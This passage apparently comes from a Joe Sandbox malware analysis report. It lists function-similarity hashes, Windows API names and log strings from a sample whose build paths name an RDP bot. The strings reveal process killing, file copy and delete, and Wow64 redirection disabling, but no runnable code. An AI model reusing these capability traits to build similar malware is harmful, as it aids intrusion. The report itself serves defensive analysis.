                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 1211020085-2360327764
                  • Opcode ID: 19f042045840d5d3eb36ed95b06cd52f256d5f133c4c7940f7f514fe41e03903
                  • Instruction ID: 6a2c8faa9014bc144bec5bbb40c0c77b09649269a7f8e083fddcaf864a657dce
                  • Opcode Fuzzy Hash: 19f042045840d5d3eb36ed95b06cd52f256d5f133c4c7940f7f514fe41e03903
                  • Instruction Fuzzy Hash: 07115615E09703C2FE74BF57A4E02BAA691AF45785F84303BCC0E06395EE6EE845CA20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
                  • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
                  • API String ID: 1211020085-2360327764
                  • Opcode ID: e928bc0f590e2b4450bf1618627d5d7b38f507986b0e6c1c84d8edb77f257348
                  • Instruction ID: 869b63d113741f7dd43a7c6ebdbfa47e39c525008781f3f5b6be0860adbf0e55
                  • Opcode Fuzzy Hash: e928bc0f590e2b4450bf1618627d5d7b38f507986b0e6c1c84d8edb77f257348
                  • Instruction Fuzzy Hash: 92115615E09603C2FE74BF57A4E02BAA691EF45785F84303BCC0E06395EE6EE845CA21
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CopyErrorFileLastfflushfwrite
                  • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                  • API String ID: 2887799713-3464183404
                  • Opcode ID: f9ac9bf883ef43ce182d0056e60772d072f58fc179424d896cf5537b7f0e4c98
                  • Instruction ID: c376304e46b729a5f1aeaafb6993537a98a551bbc86a63cdd74c9820fd47eee1
                  • Opcode Fuzzy Hash: f9ac9bf883ef43ce182d0056e60772d072f58fc179424d896cf5537b7f0e4c98
                  • Instruction Fuzzy Hash: 4F417195D1D627C1FA346F07A884379EA507F04BCCED82133C90F467A4EEACA681CB21
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                  • API String ID: 2018770650-4119452840
                  • Opcode ID: 0a88ac8f070a3a9d57df25c5a9cf07c1e47b3266f286fd42d7bcd3b5c35bbf09
                  • Instruction ID: c89e835562d34dba828033f7df89c111d4a1e482c7fbdc358896f44b46f94062
                  • Opcode Fuzzy Hash: 0a88ac8f070a3a9d57df25c5a9cf07c1e47b3266f286fd42d7bcd3b5c35bbf09
                  • Instruction Fuzzy Hash: DF313A55E0CA0BD2FA30BF0BE8D07B8A2514F81345ED5A533C91E073A1ED1CA885CB2A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                  • API String ID: 39653677-892027187
                  • Opcode ID: 834ad89fd81bb6f12e6f2cf6b87fba45b986254a69fb60778864facdba06d0bd
                  • Instruction ID: 8e3ce6b0bac65e6bf0edf5386b6c76b13c6d237a6029616a45abc02fc2f62ca2
                  • Opcode Fuzzy Hash: 834ad89fd81bb6f12e6f2cf6b87fba45b986254a69fb60778864facdba06d0bd
                  • Instruction Fuzzy Hash: 4651D191B0A593D5FE31BF1BA9907B59A50BF11788FD46033DA0E0B395DE2CE941EB20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$strcat
                  • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                  • API String ID: 2335785903-2423714266
                  • Opcode ID: 002a1bd5d54c3b6586b8a644116e7917ca091c793a1457080aefde52a79dcf43
                  • Instruction ID: ab2c7d35b6f6475aa7996b3b32001c2e5087fdb0bd48c4d044e6baf138440801
                  • Opcode Fuzzy Hash: 002a1bd5d54c3b6586b8a644116e7917ca091c793a1457080aefde52a79dcf43
                  • Instruction Fuzzy Hash: AE11B161B08A53C4FE217F2B9A903B9D6915F12788FCC6132DE4D0B386EE2CD401C760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fwprintf$strlen
                  • String ID: %*.*S$%-*.*S$%.*S
                  • API String ID: 2636243462-2115465065
                  • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                  • Instruction ID: e85d51f045a17cb778953c5c00440ae6a912a5c112654deafa770443f2b9edfa
                  • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
                  • Instruction Fuzzy Hash: BF31D172E18642C5EB60AE679894578E290EF44BA8F84E133DD1D8BB85DE2CE4018F60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AddressErrorLastLibraryLoadProc
                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                  • API String ID: 3511525774-1584720945
                  • Opcode ID: a1163239072c5e3b007d0723148a620b3626d1c35fe5edc271344cef0e6d409f
                  • Instruction ID: aae1a1147b5eff9f82401b7d25687a3453459e0107ac7078aab7bae9552cb6ca
                  • Opcode Fuzzy Hash: a1163239072c5e3b007d0723148a620b3626d1c35fe5edc271344cef0e6d409f
                  • Instruction Fuzzy Hash: B8119360E19A43E1FE21BF1BA8C13B4E6506F54304FC01037D44D56BB2EE6DE549CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                  • API String ID: 1533789296-1853374401
                  • Opcode ID: e4e19c2aad9346fb89ce7b23d1cf737269ca9b7c49a29349c8f40fb2de451c24
                  • Instruction ID: ccec964e07b37380fd8784405280e6fb396a550c514a3abb4fd4c6781637ede8
                  • Opcode Fuzzy Hash: e4e19c2aad9346fb89ce7b23d1cf737269ca9b7c49a29349c8f40fb2de451c24
                  • Instruction Fuzzy Hash: F2018064E18943E1FE21BF1BA8D02B4E6606F54704FC06037D40E86BB2EE6EE945CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                  • API String ID: 2962429428-1801624891
                  • Opcode ID: f0180c40217310ddaf9a2907391c50a8977b70553ddb4cbf28bc3dd89bb39de8
                  • Instruction ID: c8c8ac816acd70a40f20cfe5c26e90277a9aaeddce81391ec7340fbe144f5d78
                  • Opcode Fuzzy Hash: f0180c40217310ddaf9a2907391c50a8977b70553ddb4cbf28bc3dd89bb39de8
                  • Instruction Fuzzy Hash: F3F0F861A0885AD0EE10EF66F8A05E8A720BF44748FC84133DA0D477A0AE3CD947C760
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: DeviceErrorLastQuery
                  • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                  • API String ID: 963133057-3473575966
                  • Opcode ID: 96fb14efba710c141bb335b8f3c32ab00cd84db9b91770259451e3a57f39f35f
                  • Instruction ID: 5661b4322b2e4eeb2fcc45edb617cc151169e429d416986429ffd3f75ae4165e
                  • Opcode Fuzzy Hash: 96fb14efba710c141bb335b8f3c32ab00cd84db9b91770259451e3a57f39f35f
                  • Instruction Fuzzy Hash: 97417B13E0E567C6FA707E1AA4C03B9D251EF40B94F952037DD5E173C1EE6CAC81AAA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fwprintf
                  • String ID: %*.*s$%-*.*s$%.*s$%S%S
                  • API String ID: 968622242-2451587232
                  • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                  • Instruction ID: 7e1ed3601e7af5eb0924bc5d44470acf6af70d7966ce0515c1dc49095c672e78
                  • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
                  • Instruction Fuzzy Hash: 8E318472F08603C5E770AE279884679EB92EF44B94F84E133D90D8B785DE2CE8019F60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: CriticalDeleteSectionfclose
                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                  • API String ID: 3387974148-4247581856
                  • Opcode ID: 516a6b51dd18c9db523f3b99fb8c0a87e7684494f60d68de8cd217c2c27a3df6
                  • Instruction ID: 7fb82f88b92b60fbfb4eb868a1173b8d15dc6733361d6c969582013baad4febf
                  • Opcode Fuzzy Hash: 516a6b51dd18c9db523f3b99fb8c0a87e7684494f60d68de8cd217c2c27a3df6
                  • Instruction Fuzzy Hash: 0CF09224A09643C5FE14BF57E8E43B5A760AF85304FC85537C00D563A1DF6E6049D760
                  APIs
                  • VirtualProtect.KERNEL32(?,?,00007FF764CDA1E8,00000000,?,?,?,00007FF764CDA1E0,00007FF764CC1208,?,?,?,00007FF764CC1313), ref: 00007FF764CCABC2
                  Strings
                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF764CCAB5D
                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF764CCAAEB
                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF764CCAA62
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                  • API String ID: 544645111-1286557213
                  • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                  • Instruction ID: 9bdc52d9f671a63f8c81e6919ea25f58977fcec996520706e3e51a2842e8380f
                  • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
                  • Instruction Fuzzy Hash: 0F619F71F08502D9EA20AF57D588378B3A1AB84794F84A137C91D437D5DE3EE581CF20
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorHandleLastModule
                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                  • API String ID: 4242514867-2427012484
                  • Opcode ID: e49a3d3ce0dc75b7e694a28af21553a79d4703dc04341766b27d901c948abc4c
                  • Instruction ID: f5164b3733b1d443a56c0c8724ac59f77497a51c3f6118a3a06051d7a1900729
                  • Opcode Fuzzy Hash: e49a3d3ce0dc75b7e694a28af21553a79d4703dc04341766b27d901c948abc4c
                  • Instruction Fuzzy Hash: 00F01C24A08602C0EB30AF5AE4803A9AB60EF44398FC45133C54D027A8DE2CD149CF20
                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Byte$CharMultiWide$Lead_errno
                  • String ID:
                  • API String ID: 2766522060-0
                  • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                  • Instruction ID: 466167b9e3471fb0b0ea379e321396f2925be106ac78a036eaf6317059412b49
                  • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
                  • Instruction Fuzzy Hash: 5931EA72A0D282C9FB705F279480379E690AB9678CF844136DA9C437D5DF3CD545C720
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: signal
                  • String ID: CCG
                  • API String ID: 1946981877-1584390748
                  • Opcode ID: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                  • Instruction ID: 89fe9a61647404e3f885d4208e2199dd7d46ef15409ba6882720d735289ef113
                  • Opcode Fuzzy Hash: e05e11b7b03da478cb3eff391acbc219d4d7163988d74bb8d834af9c7e0f8f44
                  • Instruction Fuzzy Hash: A721D361E0C502C7FE747A1784C8338A1829FC5365FA8A937C90E823E1DE5FB8C19A31
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-3474627141
                  • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
